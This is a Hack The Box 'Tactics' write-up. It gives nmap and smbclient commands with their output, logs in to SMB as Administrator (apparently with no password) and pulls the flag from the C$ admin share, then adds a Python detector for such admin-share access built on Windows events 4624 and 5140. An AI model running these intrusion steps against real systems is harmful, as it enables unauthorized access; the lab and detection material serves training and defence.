HTB Tactics

$ nmap -v -Pn 10.129.251.21

Host discovery disabled (-Pn). All addresses will be marked 'up' and scan times may be slower.
Starting Nmap 7.92 ( https://nmap.org ) at 2022-07-10 10:01 CEST
Initiating Parallel DNS resolution of 1 host. at 10:01
Completed Parallel DNS resolution of 1 host. at 10:01, 0.04s elapsed
Initiating Connect Scan at 10:01
Scanning 10.129.251.21 [1000 ports]
Discovered open port 139/tcp on 10.129.251.21
Discovered open port 135/tcp on 10.129.251.21
Discovered open port 445/tcp on 10.129.251.21
Completed Connect Scan at 10:01, 6.81s elapsed (1000 total ports)
Nmap scan report for 10.129.251.21
Host is up (0.045s latency).
Not shown: 997 filtered tcp ports (no-response)
PORT    STATE SERVICE
135/tcp open  msrpc
139/tcp open  netbios-ssn
445/tcp open  microsoft-ds

Read data files from: /usr/bin/../share/nmap
Nmap done: 1 IP address (1 host up) scanned in 6.89 seconds

We can see that the box has SMB enabled on port 445.
SMB stands for Server Message Block.

$ smbclient -L 10.129.251.21

Password for [WORKGROUP\ruben]:
session setup failed: NT_STATUS_ACCESS_DENIED

If we don’t add a -U parameter, the smbclient request is performed as the current local user.

The only user we currently know the box will contain is Administrator, so we can use it.

$ smbclient -L 10.129.251.21 -U Administrator

Password for [WORKGROUP\Administrator]:

	Sharename       Type      Comment
	---------       ----      -------
	ADMIN$          Disk      Remote Admin
	C$              Disk      Default share
	IPC$            IPC       Remote IPC
Reconnecting with SMB1 for workgroup listing.
do_connect: Connection to 10.129.251.21 failed (Error NT_STATUS_RESOURCE_NAME_NOT_FOUND)
Unable to connect with SMB1 -- no workgroup available

$ smbclient \\\\10.129.251.21\\C$ -U Administrator

Password for [WORKGROUP\Administrator]:
Try "help" to get a list of possible commands.
smb: \>

smb: \> dir

 $Recycle.Bin                      DHS        0  Wed Apr 21 17:23:49 2021
 Config.Msi                        DHS        0  Wed Jul  7 20:04:56 2021
 Documents and Settings          DHSrn        0  Wed Apr 21 17:17:12 2021
 pagefile.sys                      AHS 738197504  Sun Jul 10 09:59:15 2022
 PerfLogs                            D        0  Sat Sep 15 09:19:00 2018
 Program Files                      DR        0  Wed Jul  7 20:04:24 2021
 Program Files (x86)                 D        0  Wed Jul  7 20:03:38 2021
 ProgramData                        DH        0  Wed Apr 21 17:31:48 2021
 Recovery                         DHSn        0  Wed Apr 21 17:17:15 2021
 System Volume Information         DHS        0  Wed Apr 21 17:34:04 2021
 Users                              DR        0  Wed Apr 21 17:23:18 2021
 Windows                             D        0  Wed Jul  7 20:05:23 2021

3774463 blocks of size 4096. 1156936 blocks available

smb: \> cd Users
smb: \Users> dir

  .                                  DR        0  Wed Apr 21 17:23:18 2021
  ..                                 DR        0  Wed Apr 21 17:23:18 2021
  Administrator                       D        0  Wed Apr 21 17:23:32 2021
  All Users                       DHSrn        0  Sat Sep 15 09:28:48 2018
  Default                           DHR        0  Wed Apr 21 17:17:12 2021
  Default User                    DHSrn        0  Sat Sep 15 09:28:48 2018
  desktop.ini                       AHS      174  Sat Sep 15 09:16:48 2018
  Public                             DR        0  Wed Apr 21 17:23:31 2021

3774463 blocks of size 4096. 1156410 blocks available
smb: \Users\> cd Administrator

smb: \Users\Administrator> cd Desktop
smb: \Users\Administrator\Desktop> get flag.txt

getting file \Users\Administrator\Desktop\flag.txt of size 32 as flag.txt (0,2 KiloBytes/sec) (average 0,2 KiloBytes/sec)

smb: \Users\Administrator\Desktop> exit
$ cat flag.txt

f751XXXXXXXXXXXXXXXXXXXXXXXXXXXX
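
Seen from the defender's side, the session above is a network logon as Administrator followed by access to the C$ administrative share. The following is an added example, not part of the original write-up: it correlates Windows Security events 4624 (logon, LogonType 3 = network) and 5140 (network share accessed) to flag that pattern. It assumes the "Audit File Share" policy is enabled so that 5140 is logged; the records, the source address and the function name are constructed for illustration.

```python
import re

# Administrative disk shares: ADMIN$ or a drive-letter share such as C$.
# IPC$ is deliberately excluded, because any share listing touches it.
ADMIN_SHARE = re.compile(r"\\(ADMIN|[A-Z])\$$", re.IGNORECASE)

# Constructed sample records: Security events flattened to dicts ("Time" is a simplified key).
# Field names follow events 4624 and 5140; every value here is invented.
EVENTS = [
    {"EventID": 4624, "Time": "2022-07-10T08:02:11Z", "TargetUserName": "Administrator",
     "LogonType": 3, "IpAddress": "10.10.14.5", "TargetLogonId": "0x3e9a1"},
    {"EventID": 5140, "Time": "2022-07-10T08:02:12Z", "SubjectUserName": "Administrator",
     "SubjectLogonId": "0x3e9a1", "IpAddress": "10.10.14.5", "ShareName": r"\\*\IPC$"},
    {"EventID": 5140, "Time": "2022-07-10T08:03:40Z", "SubjectUserName": "Administrator",
     "SubjectLogonId": "0x3e9a1", "IpAddress": "10.10.14.5", "ShareName": r"\\*\C$"},
    {"EventID": 4624, "Time": "2022-07-10T08:05:00Z", "TargetUserName": "backup_svc",
     "LogonType": 3, "IpAddress": "10.0.0.20", "TargetLogonId": "0x41b22"},
    {"EventID": 5140, "Time": "2022-07-10T08:05:01Z", "SubjectUserName": "backup_svc",
     "SubjectLogonId": "0x41b22", "IpAddress": "10.0.0.20", "ShareName": r"\\*\Reports"},
    {"EventID": 4624, "Time": "2022-07-10T09:00:00Z", "TargetUserName": "Administrator",
     "LogonType": 2, "IpAddress": "-", "TargetLogonId": "0x50c01"},  # console logon
]

def admin_share_alerts(events, watched_accounts=("administrator",), trusted_sources=()):
    """Flag admin disk share access inside a network logon session of a watched account."""
    sessions, alerts = {}, []
    for ev in events:
        if ev["EventID"] == 4624:
            # Remember only network logons of watched accounts from untrusted sources.
            if (ev["LogonType"] == 3
                    and ev["TargetUserName"].lower() in watched_accounts
                    and ev["IpAddress"] not in trusted_sources):
                sessions[ev["TargetLogonId"]] = ev
        elif ev["EventID"] == 5140:
            # 5140 carries the logon ID of the session that opened the share.
            logon = sessions.get(ev["SubjectLogonId"])
            if logon and ADMIN_SHARE.search(ev["ShareName"]):
                alerts.append({"account": logon["TargetUserName"], "source": logon["IpAddress"],
                               "share": ev["ShareName"], "time": ev["Time"]})
    return alerts

if __name__ == "__main__":
    for alert in admin_share_alerts(EVENTS):
        print(alert)
```

Management hosts that legitimately use administrative shares can be passed in `trusted_sources` to keep the alert volume down.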
